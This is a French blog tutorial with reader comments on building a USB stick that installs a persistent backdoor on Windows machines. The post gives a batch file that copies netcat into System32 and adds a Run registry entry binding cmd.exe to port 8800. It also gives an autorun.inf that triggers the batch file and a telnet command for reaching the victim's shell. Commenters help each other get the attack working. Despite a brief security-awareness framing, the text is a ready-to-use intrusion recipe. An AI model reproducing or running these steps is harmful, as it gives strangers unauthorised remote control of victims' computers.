Jan 8, 2012
10 Min
Facile

Dans les articles précédents nous avons vu comment  créer une clé USB qui récupère les mots de passe d’un ordinateur. Aujourd’hui  nous allons voir comment créer une  clé USB qui ouvre un backdoor sur un ordinateur Windows.


Ce rootkit s’exécute automatiquement, crée un backdoor  sur un PC Windows et vous permet d’accéder a l’ordinateur de la victime à distance depuis n’importe quelle machine.

Comme d’habitude l’objectif ce tutoriel,  c’est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers. 🙂

Pour créer notre clé USB backdoor, il faut suivre les étapes ci-dessus:

Étape 1

Premièrement, nous allons créer un dossier sur notre clé USB ensuite nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP. Vous pouvez aussi utiliser cryptcat, le clone de netcat, à la seule condition que ce dernier chiffre ses communications.

Télécharger Netcat pour windows 

Apres le téléchargement de Netcat, on le dézippe dans le dossier crée.


Etape 2
Ensuite nous allons créer un fichier backdoor.bat. Ce dernier va faire deux trucs:

  • Copier les fichiers du Netcat dans le dossier System32 de l’ordinateur cible
  • Ajouter une valeur chaîne dans le registre du PC victime pour que notre Backdoor se lance à chaque démarrage.

Pour cela, créez un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous:

copy *.* « %SYSTEMROOT%/System32 »
REG ADD « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun » /v « backdoor »  /t « REG_SZ » /d « %SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800 »

Etape 3
Maintenant il vous reste de créer le fichier autorun.inf
Dans cette étape nous allons créer une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.

Pour réalisez ceci,  ouvrez un nouveau document texte puis on insère ce code :

[autorun]

open=backdoor.bat

ACTION= »donner un nom à cette action »

Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf

Après l’insertion du clé USB, vous pouvez à partir de n’importe quelle machine vous connecter sur le poste de la victime avec la commande suivante:

telnet 192.168.1.17 8800
192.168.1.17 désigne l’adresse IP de la machine distant qui vous faut remplacer. Et 8800 c’est le port utiliser pr se connecter.

Et voilà ! Vou pouvez faire ce qui vous chante : ouvrir des fichiers, lancer une recherche, exécuter un programme…

Pour vous déconnecter, tapez « logout » .

Faites-en bon usage.  😀

20 Commentaires

  1. Interested

    J’ai essayé d’accéder à ma machine XP en suivant la procédure mais marche pas…même en désactivant pare feu et antivirus

        1. Si tu veux obtenir l’adresse ip d’un pc dans un réseau local, il suffit d’ouvrir le cmd et de taper la commande net view après tu fais un ping sur le nom de la machine.

          Sinon si tu as le pc entre tes mains, tu peux simplement taper dans l’invite de commande : ipconfig et tu auras l’adresse IP

  2. amine

    Bonjour,quand j’ai mis les fichiers pour créer le backdoor sur la clé USB,tous mes documents se sont transformés en raccourcis,ils ne sont plus utilisables.HELP MEEEEEEEEEEEEEE!!

  3. B3 INV!SIBL3

    Bonjour. J’ai un petit soucis avec cette backdoor. J’ai suivi chaques étapes de la procédure, mais lorsque je branche ma clé USB dans un autre ordinateur, aucune option ne s’affiche pour ouvrir NetCat et avoir accès à mon propre ordinateur. Que dois-je faire alors ? Merci de votre réponse !

    1. Max1truc

      Bonjour,

      Il faut installer le logiciel portable « putty ».
      Dans « ip adress » : l’addresse ip de l’ordinateur cible
      Dans « port » : 8800
      Et dans « connection type » : telnet

      1. Killian Armand

        Bonjour, quand j’entre la commande dans NetCat, le programme retourne « lookup failed errno 1004 NO_NATA » quelque chose comme ça… Pouvez-vous m’aider svp?

  4. Lerin

    Bonjour, je m’intéresse à la sécurité informatique et j’aurais voulu savoir si on crée une backdoor dans un ordi. Cela pose un problème car on ouvre un port ici le 8800 , donc n’importe qui peut s’y connecter si il envoie des requetes et vois le port ?
    Merci

  5. Paul

    C’est pas un antislash qu’il doit y avoir là ?

    copy *.* « %SYSTEMROOT%/System32 »
    copy *.* « %SYSTEMROOT%/System32 »
    copy *.* « %SYSTEMROOT%/System32 »

    ??
    Sinon manque plus qu’a le configurer pour piquer l’IP de l’ordinateur cible 🙂

  6. Juguet Patrick

    Ahmed bonjour,
    Article très intérèssant, un seul souci ça ne fonctionne pas, j’explique mon problème.
    J’ai un vieux pc xp sur lequel j’ai introduit la backdoor en suivant à la lettre ton tuto.
    Lorsque je lance telnet sous ubuntu celui ci ne peut résoudre l’adresse ip du xp

    telnet: could not resolve xxx.xxx.x.xx…8800/telnet: Name or service not

    un ipconfig dans la console du xp me confirme pourtant que c’est la bonne.

    Une idée ?

    Par avance merci et bonne soirée

  7. Theo Wolfersperger

    bonjour, le dossier autorun.inf ne fonctionne pas, je l’enregistre sous ,
    autorun.inf et je le met directement sur ma clé usb, mais à l’insertion
    de la clé usb, rien ne s’affiche. un peu d’aide svp ??Et la commande telnet 192.168.1.17 880 , il faut la taper dans CMD ??

    1. annonyme

      tu est sur windows 10 je suppose? PARCE QUE SUR windows 10 ils on suprimer .inf car c’etait la porte ouverte a tout les hacker